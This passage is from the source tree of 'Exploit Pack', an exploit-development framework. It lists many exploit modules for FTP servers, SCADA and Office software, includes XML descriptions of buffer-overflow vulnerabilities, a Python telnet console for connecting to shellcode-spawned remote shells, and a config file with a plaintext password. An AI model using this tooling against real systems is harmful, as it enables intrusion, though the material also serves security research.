└── Exploit Pack
├── .classpath
├── .project
├── .settings
├── .jsdtscope
├── org.eclipse.jdt.core.prefs
├── org.eclipse.mylyn.tasks.ui.prefs
├── org.eclipse.wst.jsdt.ui.superType.container
└── org.eclipse.wst.jsdt.ui.superType.name
├── bin
├── .gitignore
├── CheckUpdate$1.class
├── CheckUpdate.class
├── org
│ └── eclipse
│ │ └── wb
│ │ └── swt
│ │ └── SWTResourceManager.class
└── resources
│ ├── 1316133571_package_go.png
│ ├── 1316133906_package.png
│ ├── 1316134049_table_save.png
│ ├── 1316134303_application_form_delete.png
│ ├── 1316134425_cut_red.png
│ ├── 1316134439_page_copy.png
│ ├── 1316134460_page_white_paste.png
│ ├── 1316134599_chart_bar.png
│ ├── 1330156330_key.png
│ ├── 1330157278_key.png
│ ├── Folder_o.gif
│ ├── Thumbs.db
│ ├── about.png
│ ├── about2.png
│ ├── application.png
│ ├── arrow_redo.png
│ ├── arrow_undo.png
│ ├── binary.gif
│ ├── binary.png
│ ├── bug.png
│ ├── checkupdate.png
│ ├── close.gif
│ ├── cog.png
│ ├── computer.png
│ ├── download.png
│ ├── editor.png
│ ├── find.png
│ ├── folder.png
│ ├── folderpath.png
│ ├── help.png
│ ├── history.png
│ ├── logo2.png
│ ├── modulesearch.png
│ ├── port.png
│ ├── preferences.png
│ ├── refresh.png
│ ├── reportbug.png
│ ├── run.png
│ ├── search.gif
│ ├── splash.png
│ ├── splash2.png
│ ├── splashep.png
│ ├── square_redS.gif
│ ├── square_yellowS.gif
│ ├── stop.png
│ ├── terminal.png
│ ├── up.png
│ ├── updatebrowser.png
│ ├── updatemanager.png
│ ├── updater.png
│ ├── webdown.gif
│ ├── webup.gif
│ ├── www.png
│ └── xpFolder.gif
├── data
├── agent
│ └── agentconnect.py
├── config
│ ├── exploitpack.config
│ └── exploitpack1
├── newagent.wav
└── package.png
├── exploits
├── AB-Unreal-Server.xml
├── ActFax-FTP-Server.xml
├── Adobe-Flash-Mp4.xml
├── Apache-Mod-JK.xml
├── AudioTran-PLS.xml
├── Avaya-winpdm.xml
├── Aviosoft-Digital.xml
├── Avira-Guard.xml
├── BIG-Ant-Server-XPLT.xml
├── BIG-Ant-Server.xml
├── Bison-FTP-Server-MKD.xml
├── Bison-FTP-Server.xml
├── Bopup-Com-Server.xml
├── CA-ArcServe.xml
├── Cerberus-FTP-Server.xml
├── CoDeSyS-SCADA-Server.xml
├── Cogent-Datahub.xml
├── Core-FTP-Server.xml
├── Denial-Of-Service.xml
├── Disk-Pulse-Server.xml
├── EChat-Server-v2.5.xml
├── Easy-FTP-Server-1.7.11.xml
├── Example.xml
├── FTP-Getter.xml
├── Free-Float-FTP-ACCL.xml
├── Free-Float-FTP-REST.xml
├── Free-Float-FTP-Server.xml
├── GOM-Player.xml
├── IBM-Tivoli-Storage.xml
├── KingView-Scada.xml
├── KnFTP-Server.xml
├── Kolibri-Server.xml
├── LDAP-Server.xml
├── LDAP-Vault.xml
├── Microsoft-Excel-Record.xml
├── Microsoft-Visio.xml
├── Microsoft-Word-Record.xml
├── Quick-Player.xml
├── Remote-Scanner.xml
├── SAP-Server-MaxDB.xml
├── SDP-Downloader.xml
├── Savant-Web-Server.xml
├── Script-FTP-3.3.xml
├── Simple-HTTPD.xml
├── Solar-FTP-Server.xml
├── Sysax-multi.xml
├── TFTP-Server-1.4ST.xml
├── UPlus-FTP-Server.xml
├── Verm-FTP-Daemon.xml
├── Windows-Movie-Maker.xml
├── XM-Personal-FTP-Server.xml
├── XlightFTP-Server-v3.7.0.xml
├── YourPersonalWebServer.xml
├── code
│ ├── ABunreal.py
│ ├── BigAnt_Server_version_2.50_XPLT.py
│ ├── Cogent-datahub.py
│ ├── CoreFTP.py
│ ├── DenialOfService80.py
│ ├── EChat-Server-v2.5.py
│ ├── EasyFTPServer1.7.11.py
│ ├── Example.py
│ ├── ExploitActFax.py
│ ├── ExploitAudiotran.py
│ ├── ExploitBIGAntServer.py
│ ├── ExploitMSExcel.py
│ ├── ExploitMSWord.py
│ ├── ExploitQuickPlayer.py
│ ├── FreeFloatFTPServer.py
│ ├── KnFTPServer.py
│ ├── SavantWebServer.py
│ ├── TFTP_Server1.4ST.py
│ ├── Vermillion_FTP_Deamon_v1.31_Remote_BOF_Exploit.py
│ ├── WMMaker.py
│ ├── XMEasyPersonalFtp.py
│ ├── XlightServer3.7.0.py
│ ├── YourOpenPersonalWEBSERVER_DCA-00015.py
│ ├── adobeflashmp4.py
│ ├── avayawinpdm.py
│ ├── avguard.py
│ ├── aviosoftdigital.py
│ ├── bftp_bof.py
│ ├── bisonftpserver.py
│ ├── bopup.py
│ ├── ca_bof_poc.py
│ ├── cerberusftpserver-overflow.py
│ ├── codeweb.py
│ ├── data
│ │ └── src.MSWMM
│ ├── diskpulseserver-overflow.py
│ ├── dsmcad.py
│ ├── exploit.html
│ ├── freefloatftpACCL.py
│ ├── freefloatftpREST.py
│ ├── ftpgetter.py
│ ├── gomplayer.py
│ ├── kingview.py
│ ├── kolibry.py
│ ├── ldap_server_0day.py
│ ├── microsoft-visio.py
│ ├── output
│ │ ├── document test.doc
│ │ ├── exploit.m3u
│ │ └── spreadsheet test.xls
│ ├── sapmaxdb-exec.py
│ ├── scriptftp33.py
│ ├── sdpDownloader.py
│ ├── sidvault_ldap.py
│ ├── simplehttpd142.py
│ ├── solarftpPASVexploit.py
│ ├── sysaxmulti.py
│ └── uplusftp-overflow.py
└── index
│ ├── data.list
│ ├── module.list
│ └── xml.list
├── log
├── Sessions.log
└── exploitpack.log
├── src
├── CheckUpdate.java
├── com
│ └── exploitpack
│ │ ├── agent
│ │ ├── CheckConnection.java
│ │ ├── CheckOS.java
│ │ ├── Connect.java
│ │ └── Disconnect.java
│ │ ├── editor
│ │ ├── JunkDialog.java
│ │ ├── MainEditor.java
│ │ ├── SWTTextEditor.java
│ │ ├── TabsTest.java
│ │ └── TextEditor.java
│ │ ├── main
│ │ ├── About.java
│ │ ├── BalloonWindow.java
│ │ ├── Base64.java
│ │ ├── CheckUpdate.java
│ │ ├── CheckWebsite.java
│ │ ├── License.java
│ │ ├── MainWindow.java
│ │ ├── OSValidator.java
│ │ ├── Preferences.java
│ │ ├── Register.java
│ │ ├── Reports.java
│ │ ├── RequirementInstaller.java
│ │ ├── SplashScreen.java
│ │ ├── SysTray.java
│ │ ├── Updater.java
│ │ └── XMLTreenode.java
│ │ ├── project
│ │ ├── ProjectWindow.java
│ │ └── ProjectWindow2.java
│ │ └── scanner
│ │ └── ShowDialog.java
├── org
│ └── eclipse
│ │ └── wb
│ │ └── swt
│ │ └── SWTResourceManager.java
└── resources
│ ├── 1316133571_package_go.png
│ ├── 1316133906_package.png
│ ├── 1316134049_table_save.png
│ ├── 1316134303_application_form_delete.png
│ ├── 1316134425_cut_red.png
│ ├── 1316134439_page_copy.png
│ ├── 1316134460_page_white_paste.png
│ ├── 1316134599_chart_bar.png
│ ├── 1330156330_key.png
│ ├── 1330157278_key.png
│ ├── Folder_o.gif
│ ├── Thumbs.db
│ ├── about.png
│ ├── about2.png
│ ├── application.png
│ ├── arrow_redo.png
│ ├── arrow_undo.png
│ ├── binary.gif
│ ├── binary.png
│ ├── bug.png
│ ├── checkupdate.png
│ ├── close.gif
│ ├── cog.png
│ ├── computer.png
│ ├── download.png
│ ├── editor.png
│ ├── find.png
│ ├── folder.png
│ ├── folderpath.png
│ ├── help.png
│ ├── history.png
│ ├── logo2.png
│ ├── modulesearch.png
│ ├── port.png
│ ├── preferences.png
│ ├── refresh.png
│ ├── reportbug.png
│ ├── run.png
│ ├── search.gif
│ ├── splash.png
│ ├── splash2.png
│ ├── splashep.png
│ ├── square_redS.gif
│ ├── square_yellowS.gif
│ ├── stop.png
│ ├── terminal.png
│ ├── up.png
│ ├── updatebrowser.png
│ ├── updatemanager.png
│ ├── updater.png
│ ├── webdown.gif
│ ├── webup.gif
│ ├── www.png
│ └── xpFolder.gif
├── swing2swt.jar
└── test.html
/Exploit Pack/.classpath:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Exploit Pack/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | Exploit Pack
4 |
5 |
6 |
7 |
8 |
9 | org.eclipse.wst.jsdt.core.javascriptValidator
10 |
11 |
12 |
13 |
14 | org.eclipse.jdt.core.javabuilder
15 |
16 |
17 |
18 |
19 |
20 | org.eclipse.jdt.core.javanature
21 | org.eclipse.wst.jsdt.core.jsNature
22 |
23 |
24 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/.jsdtscope:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.jdt.core.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
5 | org.eclipse.jdt.core.compiler.compliance=1.6
6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate
7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate
8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate
9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
11 | org.eclipse.jdt.core.compiler.source=1.6
12 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.mylyn.tasks.ui.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | project.repository.kind=githubGists
3 | project.repository.url=https\://gist.github.com
4 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.wst.jsdt.ui.superType.container:
--------------------------------------------------------------------------------
1 | org.eclipse.wst.jsdt.launching.baseBrowserLibrary
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.wst.jsdt.ui.superType.name:
--------------------------------------------------------------------------------
1 | Window
--------------------------------------------------------------------------------
/Exploit Pack/bin/.gitignore:
--------------------------------------------------------------------------------
1 | /com
2 |
--------------------------------------------------------------------------------
/Exploit Pack/bin/CheckUpdate$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/CheckUpdate$1.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/CheckUpdate.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/CheckUpdate.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/org/eclipse/wb/swt/SWTResourceManager.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/org/eclipse/wb/swt/SWTResourceManager.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316133571_package_go.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316133571_package_go.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316133906_package.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316133906_package.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134049_table_save.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134049_table_save.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134303_application_form_delete.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134303_application_form_delete.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134425_cut_red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134425_cut_red.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134439_page_copy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134439_page_copy.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134460_page_white_paste.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134460_page_white_paste.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134599_chart_bar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134599_chart_bar.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1330156330_key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1330156330_key.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1330157278_key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1330157278_key.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/Folder_o.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/Folder_o.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/Thumbs.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/Thumbs.db
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/about.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/about.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/about2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/about2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/application.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/application.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/arrow_redo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/arrow_redo.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/arrow_undo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/arrow_undo.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/binary.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/binary.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/binary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/binary.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/bug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/bug.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/checkupdate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/checkupdate.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/close.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/close.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/cog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/cog.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/computer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/computer.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/download.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/download.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/editor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/editor.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/find.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/find.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/folder.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/folderpath.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/folderpath.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/help.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/history.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/history.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/logo2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/logo2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/modulesearch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/modulesearch.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/port.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/preferences.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/preferences.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/refresh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/refresh.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/reportbug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/reportbug.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/run.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/search.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/search.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splash.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splash2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splash2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splashep.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splashep.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/square_redS.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/square_redS.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/square_yellowS.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/square_yellowS.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/stop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/stop.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/terminal.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/up.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updatebrowser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updatebrowser.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updatemanager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updatemanager.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updater.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updater.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/webdown.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/webdown.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/webup.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/webup.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/www.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/www.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/xpFolder.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/xpFolder.gif
--------------------------------------------------------------------------------
/Exploit Pack/data/agent/agentconnect.py:
--------------------------------------------------------------------------------
1 | #Exploit Pack - Security Framework for Exploit Developers
2 | #Copyright 2011 Juan Sacco http://exploitpack.com
3 | #
4 | #This program is free software: you can redistribute it and/or modify it under the terms of the
5 | #GNU General Public License as published by the Free Software Foundation, either version 3
6 | #or any later version.
7 | #
8 | #This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
9 | #without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
10 | #PURPOSE. See the GNU General Public License for more details.
11 | #
12 | #You should have received a copy of the GNU General Public License along with this program.
13 | #If not, see http://www.gnu.org/licenses/
14 |
15 | import sys
16 | import telnetlib
17 |
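# Remote shellcode console: a thin wrapper around telnetlib that opens a raw
# TCP session to <host> <port> (taken from the command line) and hands the
# terminal to Telnet.interact() until the user presses CTRL+C.
# telnetlib offers no encryption and no peer authentication, so everything
# typed or received on this session travels in the clear.
if len(sys.argv) < 3:
    # Indexing sys.argv blindly died with an IndexError traceback; print a
    # usage line and exit with a conventional usage status instead.
    sys.stderr.write("Usage: agentconnect.py <host> <port>\n")
    sys.exit(2)

Host = sys.argv[1]
ShellCodePort = sys.argv[2]

# Reject a non-numeric or out-of-range port before touching the network so
# the user gets a clear message rather than a socket-layer error.
try:
    _port = int(ShellCodePort)
except ValueError:
    _port = -1
if not 1 <= _port <= 65535:
    sys.stderr.write("Invalid port: %r\n" % (ShellCodePort,))
    sys.exit(2)

print("Exploit Pack - Remote Shellcode Console\r\n")
print("Connecting to " + Host)
print("Please wait...\r\n")
print("CTRL+C to exit\r\n")

try:
    TelnetConnection = telnetlib.Telnet(Host, _port)
    try:
        TelnetConnection.interact()
    finally:
        # Release the socket whether interact() returned or raised.
        TelnetConnection.close()
except KeyboardInterrupt:
    # CTRL+C is the documented exit path; the former bare `except:` caught it
    # too and misreported it as a connection error.
    print("\r\nDisconnected")
except (EnvironmentError, EOFError) as err:
    # EnvironmentError covers socket.error/gaierror on both Python 2 and 3
    # without importing socket; telnetlib's read paths raise EOFError when
    # the peer closes the connection.
    print("Sorry, connection error")
    sys.stderr.write("%s\n" % (err,))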
--------------------------------------------------------------------------------
/Exploit Pack/data/config/exploitpack.config:
--------------------------------------------------------------------------------
1 | /usr/bin/python2.7
2 |
3 | Configured automatically
4 | Configured automatically
5 | BetaUser
6 | asd123
7 |
--------------------------------------------------------------------------------
/Exploit Pack/data/config/exploitpack1:
--------------------------------------------------------------------------------
1 | 1
--------------------------------------------------------------------------------
/Exploit Pack/data/newagent.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/data/newagent.wav
--------------------------------------------------------------------------------
/Exploit Pack/data/package.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/data/package.png
--------------------------------------------------------------------------------
/Exploit Pack/exploits/AB-Unreal-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | AB Unreal Server is prone to a remote buffer overflow because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successful exploitation will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/ActFax-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | This module exploits a stack-based buffer overflow in ActFax FTP Server version 4.27 and earlier. ActFax fails to check input size when parsing the 'USER' command.
10 | ToDo: Add Execute Shell
11 | ToDo: Test Targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Adobe-Flash-Mp4.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1
9 | allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors,
10 | a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, MacOSX, Vista, 7
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Apache-Mod-JK.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache
9 | Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute
